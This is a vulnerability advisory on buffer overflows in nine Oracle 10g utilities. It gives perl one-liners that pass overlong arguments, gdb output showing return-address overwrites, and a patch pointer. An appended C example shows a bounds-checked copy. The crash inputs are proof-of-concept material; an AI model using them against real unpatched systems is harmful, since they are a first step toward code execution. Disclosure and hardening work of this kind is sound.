---------------------------------------------------------------------------
Various Buffer Overflows in Oracle 10g Tools
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004, 2005
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Oracle10g - Version 10.1.0.3.0
Web : http://www.oracle.com

---------------------------------------------------------------------------

Vulnerability List:
~~~~~~~~~~~~~~~~~~~

A.- Oracle XML Developers Kit 10.1.0.3.0 - Production
B.- Kerberos Utilities: Version 10.1.0.3.0 - Production
C.- Configuration tool for Oracle Cluster Registry
D.- NMUCT Program
E.- MAPSGA - A utility to dump the SGA
F.- NLS Data Installation Utility: Version 10.1.0.3.0 - Production
G.- NLS Binary Message File Generation Utility: Version 10.1.0.3.0 - Production
H.- IMPDP and EXPDP: Release 10.1.0.3.0 - Production
I.- Genezi Client Shared Library 32-bit - 10.01.00.03.00

Vulnerabilities:
~~~~~~~~~~~~~~~~

A.- Oracle XML Developers Kit 10.1.0.3.0 - Production

A1. BOF in stylesheet argument

The Oracle10g Database Server XSL processor tool, called xsl, is vulnerable to
buffer overflows. This may allow an attacker to run arbitrary code.

A2. Samples

joxean@nemobox:/data/oracle/bin$ ./xsl -B a `perl -e 'print "a"x2272;'` oracle
Segmentation fault
joxean@nemobox:/data/oracle/bin$ ./xsl -f `perl -e 'print "a"x2272;'` oracle
Segmentation fault

NOTE: The argument must be more than 2272 characters long.

joxean@nemobox:/data/oracle/bin$ gdb ./xsl
(bla, bla, bla...)
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) run -B a `perl -e 'print "a"x2272;'` oracle
Starting program: /data/oracle/bin/xsl -B a `perl -e 'print "a"x2272;'` oracle
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 8457)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 8457)]
0x61616161 in ?? ()
(gdb) print $ebp
$1 = (void *) 0x61616161
(gdb) print $ebp+4
$2 = (void *) 0x61616165
(gdb) quit
The program is running.  Exit anyway? (y or n) y
joxean@nemobox:/data/oracle/bin$

We have overwritten the return address with 0x61616161, the 'a' character.

B.- Kerberos Utilities: Version 10.1.0.3.0 - Production

B1. BOF in cachename parameter

The Oracle10g Database Server Kerberos Utilities are vulnerable to buffer
overflows. This may allow an attacker to run arbitrary code.

B2. Samples

joxean@nemobox:/data/oracle/bin$ ./oklist -c `perl -e 'print "a"x300;'`
Kerberos Utilities for Linux: Version 10.1.0.3.0 - Production on 11-NOV-2004 18:52:28
Copyright (c) 1996, 2002 Oracle.  All rights reserved.
Segmentation fault

joxean@nemobox:/data/oracle/bin$ ./okdstry -c `perl -e 'print "x"x6000;'`
Kerberos Utilities for Linux: Version 10.1.0.3.0 - Production on 11-NOV-2004 18:59:59
Copyright (c) 1996, 2002 Oracle.  All rights reserved.
Segmentation fault

C.- Configuration tool for Oracle Cluster Registry

C1. Upgrade argument Buffer Overflow

The Oracle10g Database Server OCRCONFIG tool is vulnerable to buffer overflows.
This may allow an attacker to run arbitrary code.

C2. Sample

joxean@nemobox:/data/oracle/bin$ ./ocrconfig `perl -e 'print "a"x6000;'`
Segmentation fault

D.- NMUCT Program

D1. NMUCT???

I don't know what purpose this Oracle10g tool serves (?), but it is vulnerable
to buffer overflows (any parameter!).

D2. Samples

joxean@nemobox:/data/oracle/bin$ ./nmuct `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'`
Now in main ....
Segmentation fault

Next tests:

joxean@nemobox:/data/oracle/bin$ ./nmuct a a a a `perl -e 'print "a"x6000;'` a
Now in main ....
Segmentation fault
joxean@nemobox:/data/oracle/bin$ ./nmuct a a a `perl -e 'print "a"x6000;'` a a
Now in main ....
Segmentation fault
joxean@nemobox:/data/oracle/bin$ ./nmuct a a `perl -e 'print "a"x6000;'` a a a
Now in main ....
Segmentation fault
joxean@nemobox:/data/oracle/bin$ ./nmuct a `perl -e 'print "a"x6000;'` a a a a
Now in main ....
Segmentation fault
joxean@nemobox:/data/oracle/bin$ ./nmuct `perl -e 'print "a"x6000;'` a a a a a
Now in main ....
Segmentation fault

Almost any argument of this program is vulnerable to BOFs.

E.- MAPSGA - A utility to dump the SGA

E1. BOF at the first argument

The Oracle10g Database Server MAPSGA tool is vulnerable to buffer overflows.
This may allow an attacker to run arbitrary code.

E2. Sample(s)

joxean@nemobox:/data/oracle/bin$ ./mapsga `perl -e 'print "a"x60000;'`
Segmentation fault

joxean@nemobox:/data/oracle/bin$ gdb mapsga
(more bla, bla, bla...)
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) run `perl -e 'print "x"x6000;'`
Starting program: /data/oracle/bin/mapsga `perl -e 'print "x"x6000;'`
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 28581)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 28581)]
0x41044390 in getenv () from /lib/libc.so.6
(gdb) print $ebp
$1 = (void *) 0xbfffd9f4
(gdb) print $ebp+4
$2 = (void *) 0xbfffd9f8
(gdb) quit
The program is running.  Exit anyway? (y or n) y

F.- NLS Data Installation Utility: Version 10.1.0.3.0 - Production

F1. Another BOF

The Oracle10g Database Server NLS Data Installation Utility is vulnerable to
buffer overflows. This may allow an attacker to run arbitrary code.

F2. Samples

joxean@nemobox:/data/oracle/bin$ ./lxinst `perl -e 'print "x"x6000;'`
NLS Data Installation Utility: Version 10.1.0.3.0 - Production
Copyright (c) Oracle 1993, 2004.  All rights reserved.
CORE    10.1.0.3.0      Production
Segmentation fault

joxean@nemobox:/data/oracle/bin$ gdb lxinst
(And more bla, bla, bla...)
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) run `perl -e 'print "x"x6000;'`
Starting program: /data/oracle/bin/lxinst `perl -e 'print "x"x6000;'`
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 29664)]
NLS Data Installation Utility: Version 10.1.0.3.0 - Production
Copyright (c) Oracle 1993, 2004.  All rights reserved.
CORE    10.1.0.3.0      Production

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 29664)]
0x4109045d in mempcpy () from /lib/libc.so.6
(gdb) run `perl -e 'print "x"x60000;'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /data/oracle/bin/lxinst `perl -e 'print "x"x60000;'`
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 29696)]
NLS Data Installation Utility: Version 10.1.0.3.0 - Production
Copyright (c) Oracle 1993, 2004.  All rights reserved.
CORE    10.1.0.3.0      Production

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 29696)]
0x4109045d in mempcpy () from /lib/libc.so.6

G.- NLS Binary Message File Generation Utility: Version 10.1.0.3.0 - Production

G1. Another BOF :)

The Oracle10g NLS Binary Message File Generation Utility tool is vulnerable to
buffer overflows. This may allow an attacker to run arbitrary code.

G2. Samples

joxean@nemobox:/data/oracle/bin$ ./lmsgen `perl -e 'print "x"x6000;'` `perl -e 'print "x"x6000;'` `perl -e 'print "x"x6000;'`
NLS Binary Message File Generation Utility: Version 10.1.0.3.0 - Production
Copyright (c) Oracle 1979, 2004.  All rights reserved.
CORE    10.1.0.3.0      Production
Input file name too long: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx (...)
Can't open message file xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.
Incorrect number of arguments specified!
Syntax: LMSGEN <text file> <product> <facility> [language] [-i indir] [-o outdir]
Where
  <text file>   is a message text file
  <product>     the name of the product
  <facility>    the name of the facility
  [language]    optional message language in <language>_<territory>.<character set> format
                This is required if message file is not tagged properly with language
  [-i indir]    optional directory where to locate the text file
  [-o outdir]   optional directory where to put the generated binary file.
Segmentation fault

Another easy test:

lmsgen `perl -e 'print "x"x6000;'` a a

H.- IMPDP and EXPDP: Release 10.1.0.3.0 - Production

H1. Buffer overflow in EXPDP and IMPDP tools

The Oracle10g Database Server Data Pump IMPORT and EXPORT tools (called impdp
and expdp) are vulnerable to buffer overflows. This may allow code execution.

H2. Samples

joxean@nemobox:/data/oracle/bin$ ./impdp `perl -e 'print "a"x60000;'`
Segmentation fault

joxean@nemobox:/data/oracle/bin$ ./expdp `perl -e 'print "x"x5000;'`
Export: Release 10.1.0.3.0 - Production on Thursday, 11 November, 2004 20:27
Copyright (c) 2003, Oracle.  All rights reserved.
Segmentation fault

I.- Genezi Client Shared Library 32-bit - 10.01.00.03.00

I1. Another BOF

The Oracle10g Database Server Genezi tool is vulnerable to buffer overflows.
This may allow an attacker to run arbitrary code.

I2. Samples

joxean@nemobox:/data/oracle/bin$ ./genezi -c `perl -e 'print "x"x5000;'`
Segmentation fault

The fix:
~~~~~~~~

Oracle has released patches for these and more issues. Patches are available
to download from the MetaLink site, at http://metalink.oracle.com

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind. I am not liable for any direct or
indirect damages caused as a result of using the information or demonstrations
provided in any part of this advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
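Added example, not part of the advisory and not Oracle's code: every crash above is the same defect class, an argv[] element copied into a fixed-size buffer with no length check. This shows the bounded copy such a tool should use, and decodes the faulting values from the xsl gdb session (on little-endian i386, 0x61616161 is the bytes "aaaa"). The 256-byte buffer size and all function names are assumptions; the affected binaries' real buffer sizes are not given in the advisory.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of a tool's private copy of one argv[] element. */
#define ARG_BUF_SIZE 256

/* Hardened form of "copy argv[i] into a fixed buffer": check the length before
   copying and always NUL-terminate, so an over-long argument is a usage error
   instead of an overwrite of the saved frame pointer and return address. */
int copy_arg_bounded(char *dst, size_t dst_size, const char *arg) {
    size_t len = strlen(arg);
    if (dst_size == 0 || len >= dst_size)
        return -1;              /* would not fit with its terminator: reject */
    memcpy(dst, arg, len + 1);  /* copies the NUL as well */
    return 0;
}

/* Test helper: build a constructed argument of `len` copies of `fill`
   (like perl -e 'print "a"x2272') and report whether the bounded copy accepts it. */
int accepts_arg_of_len(size_t len, char fill) {
    static char arg[4096];
    char dst[ARG_BUF_SIZE];
    if (len >= sizeof arg) return 0;
    memset(arg, fill, len);
    arg[len] = '\0';
    return copy_arg_bounded(dst, sizeof dst, arg) == 0;
}

/* Decode a faulting 32-bit value into the bytes that produced it, lowest byte
   first (i386 is little-endian). The gdb output above reads this way:
   0x61616161 -> "aaaa", and $ebp+4 = 0x61616165 -> "eaaa". */
void addr_to_ascii(uint32_t addr, char out[5]) {
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)((addr >> (8 * i)) & 0xffu);
        out[i] = (b >= 0x20 && b < 0x7f) ? (char)b : '.';
    }
    out[4] = '\0';
}

/* 1 if every byte of the value is the same fill character, i.e. the register
   holds argument bytes rather than a real code or stack address (compare the
   mapsga session, where $ebp is still a stack address, 0xbfffd9f4). */
int looks_like_fill(uint32_t addr, char fill) {
    char s[5];
    addr_to_ascii(addr, s);
    return s[0] == fill && s[1] == fill && s[2] == fill && s[3] == fill;
}
```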